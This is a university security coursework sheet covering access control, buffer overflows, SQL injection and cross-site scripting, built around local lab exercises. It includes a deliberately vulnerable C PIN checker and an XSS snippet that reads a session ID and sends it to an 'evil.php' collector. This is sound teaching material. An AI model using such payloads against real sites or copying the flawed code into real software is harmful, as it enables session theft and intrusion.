Reference no: EM132851542

COMM047 Secure Systems and Applications - University of Surrey

Exercise 1: Access Control

Access Control Matrices, Lists and Capability lists

For this exercise you will need to have access to a standard Linux VM image like the COMM047-VM (Ubuntu 20.04) one available in OpenNebula.

cd into the standard /tmp directory under Ubuntu. You might find the following commands useful:

sudo, useradd, groupadd, usermod, mkdir, chown, chmod, touch and nano or vi. Use the man command to find out more about them, eg man mkdir. Within /tmp:

- Create 2 users (usera, userb) and 2 groups (COMM047 and InfoSec)
- Create a file called FileA.txt which usera owns and is able to read it.

The group owner of the file is COMM047 again and has write access to the file. No-one else has been granted any other access rights.
- Create a shell script called helloB which has the following content:
#!/bin/sh
echo "Hello B!"
which is owned by userb who as the owner has read and execute rights. The group owner of that file is InfoSec and has only been given execute access. No-one else has been granted any other access rights.
- Make usera a member of both the COMM047 and InfoSec groups while userb should just be a member of the InfoSec group but not of COMM047;
- Create a directory called ex1 is a directory owned by the system root user who has full access rights to it. The group owner of ex1 is COMM047 and has been given the read and execute permission to the directory. No-one else has been granted any other access rights.

a) Open a terminal and execute:
cd /tmp
sudo ls -al ex1 FileA.txt helloB && groups usera userb
Include a screenshot of the output of the command.

b) Ignoring the /tmp directory, who are the subjects and what are the objects in the above scenario?

c) Draw the access control matrix for usera, userb, ex1, FileA.txt and
helloB

d) From within their Ubuntu home directories(/home/usera and
/home/userb respectively) usera and userb both execute /tmp/helloB

What happens and why?

e) Both users now execute: echo "hello">>/tmp/FileA.txt
What happens and why?

Multilevel Security - Integrity
Research the Clark-Wilson and Brewer-Nash security models. You can find the original papers, "A Comparison of Commercial and Military Computer Security Policies" by Clark-Wilson and "The Chinese Wall Security Policy" by Brewer and Nash, in the Papers folder of the Coursework.zip file.

a) Provide a brief (0.5 to 1 page) overview of what the security models try to achieve and how they differ from or improve upon the Bell-LaPadula and BIBA models.

b) You must use IEEE referencing when citing your sources!

Mandatory Access Control
Linux has two popular approaches to provide MAC: SELinux and AppArmor.

a) Describe how they differ from the standard UNIX file permissions

b) Give a simple example of an AppArmor MAC policy that demonstrates how it operates.

c) In your opinion, which approach (SELinux vs AppArmor) is better and why? You might want to touch upon the usability, complexity and security provided by each framework.

(Note that there is no right or wrong answer, only a well or poorly reasoned one.)

Role-based Access Control

a) Summarize the main advantages of role-based access control.

b) Draw the access matrix corresponding to the RBAC policy depicted in the figure below, where permissions p1, p2, p3 are (object, access- right) pairs defined as follows: p1= (Appointment, Create);

p2=( RecentMedicalRecords, View & Update, OldMedical Record, View); p3=( OldMedicalRecord, View & Delete)

Unix Access Control

a) What is the setuid bit?

b) Why it is necessary for some files to be setuid root ( i.e., owned by root and has setuid bit set)?

c) What security problems may a setuid root program cause?

Exercise 2: Software Vulnerabilities

Briefly answer the following questions

a) What is heap-overflow?

b) Give THREE approaches and a short description of how they work that allow programmers to minimise the risk of buffer-overflow exploits.

c) Explain what is meant by format string problems.

d) Giving reasons, what would your top 5 recommendations be to ensure your software developers increases the security of their code?

Consider the following program

The following C program validate_Pin.c (that you can find in the Code folder of the Coursework.zip file).

#include <stdio.h> #include <string.h> #include <stdlib.h>

int main(int argc, char * argv[]){ char pin[3];
char ok = 'N';

if (argc<2){
printf("Please enter your PIN \n"); exit(0);
}

strcpy(pin, argv[1]);
if (strcmp(pin,"123")!=0){ printf ("Wrong Pin \n");

}else{

}

printf ("Correct Pin \n"); ok = 'Y';

if(ok=='Y'){
printf ("You can now withdraw money!\n");
}
return 0;
}

Compile the program as follows on the COMM047-BufferOverflow-VM
(note this one command, not two!):

gcc -fno-stack-protector validate_pin.c -ggdb -o validate_pin_no_stack_protection

a) What is the expected output if the user provides the PIN "123" ?

b) What is the expected output if the user does not provide any input?

c) Run the program and start by entering "000" (three 0s) and then keep increasing the number of 0s one by one. What happens and why?

d) Run the program and start by entering "YYY" (three Ys) and then keep increasing the number of Ys one by one. What happens and why?

e) Recompile the program with stack protection enabled: gcc -fstack-protector validate_pin.c -ggdb -o validate_pin_withProtection
Re-run step d) What happens and why?
Hint: check the stack layout of the protected and non-protected programs.

f) Change the line char pin[3]; to char pin[4]; and recompile the code using:
gcc validate_pin.c -ggdb -o validate_pin4_withProtection
and rerun Step e). What happens now and why?

Buffer-overflow via scanf
Given the C function
int scanf ( const char * format, ... );
included in the header file #include <stdio.h>, write a simple C program that contains a buffer-overflow vulnerability due to the use of scanf and explain why the program is vulnerable and how you would fix it.

(Hint: you can use scanf to read a string from stdin and store it in the array of chars buff as follows: scanf("%s", buff);)

Exercise 3: Web Attacks

Briefly answer the following questions
a) Investigate the following SQL injection attack described in:

What was the vulnerability and how was it fixed? Looking at the fix, is there an alternative approach that could have been used in the way ExponentCMS handles SQL queries?

b) "Client-side validation is too insecure. You only need to check your data on the server." Give reasons why you agree or disagree with this statement.

Web exploits
Please also download the Coursework.zip file to the COMM047-VM and extract it.
Open a terminal and install php-sqlite:

sudo apt install php-sqlite3

Now cd to the Web directory that you extracted from the Coursework.zip file. Inside that folder execute the following command in the terminal:

php -S localhost:8000

This will start a standalone php server. Open Firefox and enter the URL:

If your sqlite is installed properly the first 2 lines on that page should show something like this:
Array ([versionString]=>3.22.0 [versionNumber]=>30220000 7.2.24-0ubuntu0.18.04.6

If it doesn't then please check the terminal in which you started the standalone php server for any error messages.

a) Login.php: Navigate to
The Login.php file should produce the following form:

This form collects data and sends it to itself to verify the username and password. Investigate the code and decide whether or not it suffers from a SQL injection vulnerability.

Explain your reasoning.

b) Investigate the source code for CheckSession.php. What is the purpose of this code and why is functionality like this required by web applications?

c) Changing your name...: Login as Alice (password Al1c3) and look at your accounts and messages. Right click on the MainMenu.php page and select Inspect Element(Q):
Find the form fields associated with the My Account Details button and change the username value attribute from Alice to Peter:

Submit the form by clicking on the My Accounts Details button. What happens and why?

d) Extracting information: Using the principles from Step c), find out the account details of someone else. Explain how you achieved this.

e) Fixing the issue: How do you propose to fix this problem? Describe and explain your solution.

Hint: You probably only want the session id to be posted around...

Cross-site scripting

The Messages.php is vulnerable to an XSS attack. Can you find the vulnerability and exploit it to steal another user's session ID and send it to evil.php (check what it does...)? Describe how you would carry out the attack and how it can be prevented.

Hint: Login as Alice and try to send yourself the following message: Hi Alice! <script type="text/javascript">alert(‘XSS works!');</script>

You might also find the following piece of code useful:

<script type="text/javascript"> try {
var x=document.getElementsByName("sessionid") [0].value;
var request=new XMLHttpRequest(); request.open("GET", "https://localhost:8000/evil.php?
s_id="+x, true);
request.send();

}catch(err){}
</script>

Exercise 4: Limits of Antivirus software?

Read the following paper:"The big four - What we did wrong in Advanced Persistent Threat detection?" by Nikos Virvilis and Dimitris Gritzalis.
(You can find it in the Papers folder of the coursework.zip file)

a) Provide a brief (~1 page) summary of the paper and discuss the limits of Antivirus Software in the light of its findings. Do you think that Antivirus Software still has a role in protecting PCs?

b) You must use IEEE referencing when citing your sources!

Attachment:- Secure Systems and Applications.rar